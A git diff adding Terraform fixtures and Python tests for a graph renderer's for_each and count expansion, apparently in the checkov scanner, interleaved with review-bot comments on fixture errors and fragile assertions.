b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf @@ -0,0 +1,6 @@ +module "level2" { + source = "../level2_module" + for_each = var.file_map1_level1 + + times_to_duplicate_bucket = var.number_of_required_resources_var +} \ No newline at end of file 
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf new file mode 100644 index 00000000000..4af133126f8 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf @@ -0,0 +1,7 @@ +variable "file_map1_level1" { + type = map(string) +} + +variable "number_of_required_resources_var" { + type = number +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf new file mode 100644 index 00000000000..25c80ee2ef5 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf @@ -0,0 +1,6 @@ +resource "aws_s3_bucket_object" "this_file" { + count = var.times_to_duplicate_bucket + bucket = "your_bucket_name" + key = each.key + source = each.value +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf new file mode 100644 index 00000000000..e1e257b40fc --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf @@ -0,0 +1,3 @@ +variable "times_to_duplicate_bucket" { + type = number +} 
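Review bot: `level2_module/main.tf` uses `each.key` and `each.value` inside a resource that iterates with `count`; Terraform only defines `each` under `for_each`, so `terraform validate` would reject this fixture even though the graph renderer may accept it. If the intent is solely to exercise count handling in the renderer, `key = count.index` keeps the file valid, or add a leading comment such as `# Deliberately not valid Terraform: exercises the graph renderer's count expansion only` so nobody later "fixes" it into a different test.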
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf new file mode 100644 index 00000000000..4477e9361ae --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf @@ -0,0 +1,29 @@ +locals { + groups = { + "blue" = "blue" + "green" = "green" + } + files_map1 = { + "test1.txt" = "test1.txt" + "test2.txt" = "test2.txt" + } + number_of_required_resources = 2 +} + +# Expected resources: +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] + +module "level1" { + source = "./level1_module" + for_each = local.groups + + file_map1_level1 = local.files_map1 + number_of_required_resources_var = local.number_of_required_resources +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf new file mode 100644 index 00000000000..885a68e53e8 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf 
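Review bot: The `# Expected resources:` comment in `module_foreach_module_foreach_resource_count/main.tf` lists `this_file["test3.txt"]` / `this_file["test4.txt"]` addresses, but the resource in `level2_module` is created with `count`, so the addresses are `this_file[0]` and `this_file[1]` — which is exactly what `test_double_nested_foreach_and_count_with_variable_reference` asserts in the test file below. The eight comment lines look copied from the for_each example; rewrite them in the `module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]` form so the fixture documents what the test checks.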
@@ -0,0 +1,10 @@ + +# Expected resources: +# module.simple[0].aws_s3_bucket_object.this_file + +# Actual resources: +# NONE +module "simple" { + source = "./simple" + count = 1 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf new file mode 100644 index 00000000000..f81b8cc8f28 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf @@ -0,0 +1,14 @@ +data "aws_s3_bucket" "data_list" { + for_each = toset(var.test_list.bucket) + bucket = each.value +} + +data "aws_s3_bucket" "data_dict" { + for_each = var.test_dict.bucket + bucket = each.value +} + +data "aws_s3_bucket" "data_count" { + count = var.test_count.bucket + bucket = count.index +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf new file mode 100644 index 00000000000..a96d924bd33 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf @@ -0,0 +1,14 @@ +variable "test_list" { + bucket = ["a", "b"] +} + +variable "test_dict" { + bucket = { + key1 = "a", + key2 = "b" + } +} + +variable "test_count" { + bucket = 2 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf new file mode 100644 index 00000000000..019ff3cc629 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf @@ -0,0 +1,13 @@ +data "aws_s3_bucket" "data_dict" { + for_each = var.test_dict.bucket + bucket = each.value +} + +data "aws_s3_bucket" "data_count" { + count = var.test_count.bucket + bucket = count.index +} + +data "aws_s3_bucket" "data" { + bucket = "a" +} \ No newline at end of file 
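Review bot: `simple_count/main.tf` points `module "simple"` at `./simple`, but no `simple_count/simple/` module is added anywhere in this diff and the header already says `# Actual resources: NONE`, so as committed the fixture can only reproduce the missing-module case and no test in this diff references it. If it is meant as a known-gap reproducer, make that explicit in the comment, e.g. `# TODO: module source ./simple not yet provided; renderer currently emits no resources for count on a module`, so it is not mistaken for a working example. Separately, `data_simple/variables.tf` declares `bucket = [...]` inside `variable` blocks, which is not a valid `variable` argument in Terraform; if that is deliberate to exercise `var.test_list.bucket` resolution, a one-line comment in that file saying so would help.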
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf new file mode 100644 index 00000000000..ee85d8b430c --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf @@ -0,0 +1,15 @@ +resource "aws_s3_bucket" "data_dict" { + for_each = var.test_dict.bucket + subnet_id = each.value + bucket = data.aws_s3_bucket.data_dict[each.key].bucket +} + + +resource "aws_s3_bucket" "data_count" { + count = var.test_count.bucket + bucket = data.aws_s3_bucket.data_count[count.index].bucket +} + +resource "aws_s3_bucket" "data" { + subnet_id = data.aws_s3_bucket.data.bucket +} diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf new file mode 100644 index 00000000000..02caf819d73 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf @@ -0,0 +1,10 @@ +variable "test_dict" { + bucket = { + key1 = "a", + key2 = "b" + } +} + +variable "test_count" { + bucket = 2 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf new file mode 100644 index 00000000000..067fdda2b06 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf @@ -0,0 +1,6 @@ +module "level2" { + source = "../level2_module" + for_each = var.file_map1_level1 + + file_map_level2 = var.file_map2_level1 +} \ No newline at end of file 
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf new file mode 100644 index 00000000000..4e601f10af0 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf @@ -0,0 +1,7 @@ +variable "file_map1_level1" { + type = map(string) +} + +variable "file_map2_level1" { + type = map(string) +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf new file mode 100644 index 00000000000..7e4ad692554 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf @@ -0,0 +1,6 @@ +resource "aws_s3_bucket_object" "this_file" { + for_each = var.file_map_level2 + bucket = "your_bucket_name" + key = each.key + source = each.value +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf new file mode 100644 index 00000000000..fc8b1ddfd9d --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf @@ -0,0 +1,3 @@ +variable "file_map_level2" { + type = map(string) +} 
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf new file mode 100644 index 00000000000..da719081ea3 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf @@ -0,0 +1,32 @@ +locals { + groups = { + "blue" = "blue" + "green" = "green" + } + files_map1 = { + "test1.txt" = "test1.txt" + "test2.txt" = "test2.txt" + } + files_map2 = { + "test3.txt" = "test3.txt" + "test4.txt" = "test4.txt" + } +} + +# Expected resources: +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] + +module "level1" { + source = "./level1_module" + for_each = local.groups + + file_map1_level1 = local.files_map1 + file_map2_level1 = local.files_map2 +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf new file mode 100644 index 00000000000..20e13d97c6c --- /dev/null 
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf @@ -0,0 +1,22 @@ +locals { + groups = { + "blue" = "blue" + "green" = "green" + } + files_map1 = { + "test1" = "test1" + "test2" = "test2" + } +} + +# Expected resources: +# module.files["blue"].aws_s3_bucket_object.this_file["test1.txt"] +# module.files["blue"].aws_s3_bucket_object.this_file["test2.txt"] +# module.files["green"].aws_s3_bucket_object.this_file["test1.txt"] +# module.files["green"].aws_s3_bucket_object.this_file["test2.txt"] + +module "files" { + source = "./s3_files" + for_each = local.groups + file_map = local.files_map1 +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf new file mode 100644 index 00000000000..91db9c71cb6 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf @@ -0,0 +1,6 @@ +resource "aws_s3_bucket_object" "this_file" { + for_each = var.file_map + bucket = "your_bucket_name" + key = each.key + source = each.value +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf new file mode 100644 index 00000000000..c7721cd54e3 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf @@ -0,0 +1,3 @@ +variable "file_map" { + type = map(string) +} \ No newline at end of file 
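Review bot: The `# Expected resources:` comment in `nested_foreach_based_on_module_locals/main.tf` names `this_file["test1.txt"]` / `this_file["test2.txt"]`, but `files_map1` in the same file has keys `test1` and `test2`, and `test_nested_foreach_with_variable_reference` asserts `this_file["test1"]` / `this_file["test2"]`. Drop the `.txt` suffix from the four comment lines so the fixture agrees with both its own locals and the test that reads it.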
diff --git a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
index 50b2c89d5e5..9ddb2586686 100644
--- a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
+++ b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
@@ -387,6 +387,45 @@ def test_foreach_module_and_resource(checkov_source_path): assert graph.vertices[9].config['aws_s3_bucket_public_access_block']['var_bucket["b"]']['__address__'] == 'module.s3_module["b"].aws_s3_bucket_public_access_block.var_bucket["b"]' +@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"}) +def test_foreach_data(checkov_source_path): + dir_name = 'data_simple' + graph, _ = build_and_get_graph_by_path(dir_name, render_var=True) + tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name) + + assert len([block for block in graph.vertices if block.block_type == 'data']) == 6 + assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 6 + + data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data'] + assert 'aws_s3_bucket.data_list["b"]' in data_vertices_names + assert 'aws_s3_bucket.data_dict["key1"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[0]' in data_vertices_names + assert 'aws_s3_bucket.data_list["a"]' in data_vertices_names + assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[1]' in data_vertices_names + + +@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"}) +def test_foreach_data_with_resource(checkov_source_path): + dir_name = 'data_with_resource' + graph, _ = build_and_get_graph_by_path(dir_name, render_var=True) + tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name) + + assert len([block for block in graph.vertices if block.block_type == 'data']) == 5 + assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 5 + + data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data'] + assert 'aws_s3_bucket.data_dict["key1"]' in 
data_vertices_names + assert 'aws_s3_bucket.data_count[0]' in data_vertices_names + assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[1]' in data_vertices_names + + assert graph.vertices[0].attributes['bucket'] == graph.vertices[3].attributes['bucket'] + assert graph.vertices[1].attributes['bucket'] == graph.vertices[4].attributes['bucket'] + assert graph.vertices[8].attributes['bucket'] == graph.vertices[10].attributes['bucket'] + assert graph.vertices[9].attributes['bucket'] == graph.vertices[11].attributes['bucket'] + + @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True"}) def test_foreach_module_with_more_than_two_resources(checkov_source_path): dir_name = 'foreach_module_with_more_than_two_resources' 
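Review bot: `test_foreach_data_with_resource` compares `graph.vertices[0]`…`[11]` by position, which ties the test to the parser's vertex insertion order rather than to the data/resource pairs it is actually checking; a later change in ordering fails the test with no rendering bug behind it. Look the vertices up by identity instead, for example `by_name = {(b.block_type, b.name): b for b in graph.vertices}` and then compare `by_name[('data', 'aws_s3_bucket.data_dict["key1"]')].attributes['bucket']` with its `'resource'` counterpart. Both new tests also have no docstring saying which behaviour (`CHECKOV_ENABLE_DATAS_FOREACH_HANDLING` expanding `data` blocks with `for_each`/`count`) they pin, while the tests added in the `@@ -448` hunk below do; one sentence each would match the file's style.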
@@ -448,8 +487,89 @@ def test__get_module_with_only_relevant_foreach_idx(): nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', nested_tf_module=None)) result = ForeachModuleHandler._get_module_with_only_relevant_foreach_idx('test', original_key, module) assert result == TFModule(name='1', path='1', foreach_idx='1', - nested_tf_module=TFModule(name='2', path='2', foreach_idx='test', - nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', - nested_tf_module=None) - ) - ) + nested_tf_module=TFModule(name='2', path='2', foreach_idx='test', + nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', + nested_tf_module=None) + ) + ) + +def test_nested_foreach_with_variable_reference(): + """ + Here we test that a nested foreach loop based on module locals is correctly rendered in the Terraform graph. + """ + resources_by_group_local_var = 2 + resources_by_files_local_var = 2 + + dir_name = 'foreach_examples/nested_foreach_based_on_module_locals' + graph = build_and_get_graph_by_path(dir_name)[0] + graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices) + graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter)) + + assert len(graph_resources_created) is (resources_by_group_local_var * resources_by_files_local_var) + assert graph_resources_created == ['module.files["blue"].aws_s3_bucket_object.this_file["test1"]', + 'module.files["green"].aws_s3_bucket_object.this_file["test1"]', + 'module.files["blue"].aws_s3_bucket_object.this_file["test2"]', + 'module.files["green"].aws_s3_bucket_object.this_file["test2"]'] + + +def test_double_nested_foreach_with_variable_reference(): + """ + Here we test that a 2 level nested foreach loop based on module local vars is correctly rendered in the Terraform graph. + + In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt) + and 2 resources for each (test3.txt, test4.txt). 
+ So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource). + + The unique use case is that the for_each attributes depends on the main module's local variables. + """ + dir_name = 'foreach_examples/module_foreach_module_foreach_resource_foreach' + graph = build_and_get_graph_by_path(dir_name)[0] + + graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices) + graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter)) + + graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices) + graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter)) + + assert len(graph_modules_created) is 6 # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6) + assert len(graph_resources_created) is 8 # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8) + + assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]'] + + +def test_double_nested_foreach_and_count_with_variable_reference(): + """ + Here we test that a 2 level nested foreach loop and count based on module locals is correctly rendered in the Terraform graph. 
+ In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt) + and 2 resources for each (count of 2). + So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource: count = 2). + + The unique use case is that the count and for_each attributes (multiple levels) depends on the main module's local variables. + """ + dir_name = 'count_examples/module_foreach_module_foreach_resource_count' + graph = build_and_get_graph_by_path(dir_name)[0] + + graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices) + graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter)) + + graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices) + graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter)) + + assert len(graph_modules_created) is 6 # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6) + assert len(graph_resources_created) is 8 # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8) + + assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]'] diff --git a/tests/terraform/runner/test_runner.py b/tests/terraform/runner/test_runner.py index 7d5c10f7afa..8072dfe3b92 100644 
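Review bot: `assert len(graph_resources_created) is (resources_by_group_local_var * resources_by_files_local_var)` in `test_nested_foreach_with_variable_reference`, and the `is 6` / `is 8` asserts in the two `test_double_nested_*` functions, compare integers by identity; CPython 3.8+ emits `SyntaxWarning: "is" with a literal` for the latter and the checks only pass because small ints happen to be interned. Use equality throughout, e.g. `assert len(graph_modules_created) == 6` and `assert len(graph_resources_created) == 8`. The expected address lists are also asserted in emission order; if that order is not a contract of the renderer, comparing `sorted(graph_resources_created)` against a sorted expected list would keep these tests from flaking on an ordering change.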
--- a/tests/terraform/runner/test_runner.py +++ b/tests/terraform/runner/test_runner.py @@ -188,7 +188,7 @@ def test_runner_passing_valid_tf(self): 'hard_fail_threshold': None}), 1) summary = report.get_summary() self.assertGreaterEqual(summary['passed'], 1) - self.assertEqual(9, summary['failed']) + self.assertEqual(10, summary['failed']) self.assertEqual(1, summary['skipped']) self.assertEqual(0, summary["parsing_errors"]) @@ -337,7 +337,7 @@ def test_runner_specific_file(self): # self.assertEqual(report.get_exit_code(), 0) summary = report.get_summary() self.assertGreaterEqual(summary['passed'], 1) - self.assertEqual(5, summary['failed']) + self.assertEqual(6, summary['failed']) self.assertEqual(0, summary["parsing_errors"]) def test_check_ids_dont_collide(self): @@ -469,7 +469,7 @@ def test_no_missing_ids(self): for check_list in [aws_checks, gcp_checks, azure_checks]: check_list.sort(reverse=True, key=lambda s: int(s.split('_')[-1])) - for i in range(1, len(aws_checks) + 5): + for i in range(1, len(aws_checks) + 4): if f'CKV2_AWS_{i}' == 'CKV2_AWS_17': # CKV2_AWS_17 was overly keen and those resources it checks are created by default continue diff --git a/tests/unit/test_secrets.py b/tests/unit/test_secrets.py index ba41f491c2f..9c330f867f4 100644 --- a/tests/unit/test_secrets.py +++ b/tests/unit/test_secrets.py @@ -11,7 +11,8 @@ def test_secrets(self): 'AKIAIOSFODNN7EXAMPLE', # checkov:skip=CKV_SECRET_2 test secret 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY', # checkov:skip=CKV_SECRET_6 test secret '-----BEGIN RSA PRIVATE KEY-----\n', # checkov:skip=CKV_SECRET_13 test secret - 'Hello from Bridgecrew' + 'Hello from Bridgecrew', + 'cert-manager.io/secret: org/repo', ] # check that no category checks all
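Review bot: In `test_no_missing_ids` the loop bound moves from `len(aws_checks) + 5` to `len(aws_checks) + 4` with no comment, and nothing in the hunk says what the offset stands for, so the next person adding or removing a `CKV2_AWS` check will not know whether to move it again. Add a line above the loop such as `# +N covers CKV2_AWS ids that are intentionally absent (e.g. CKV2_AWS_17, skipped below); adjust when a gap is added or filled`, or better derive the bound from an explicit list of skipped ids instead of a constant. The enclosing `test_no_missing_ids` starts before the hunk.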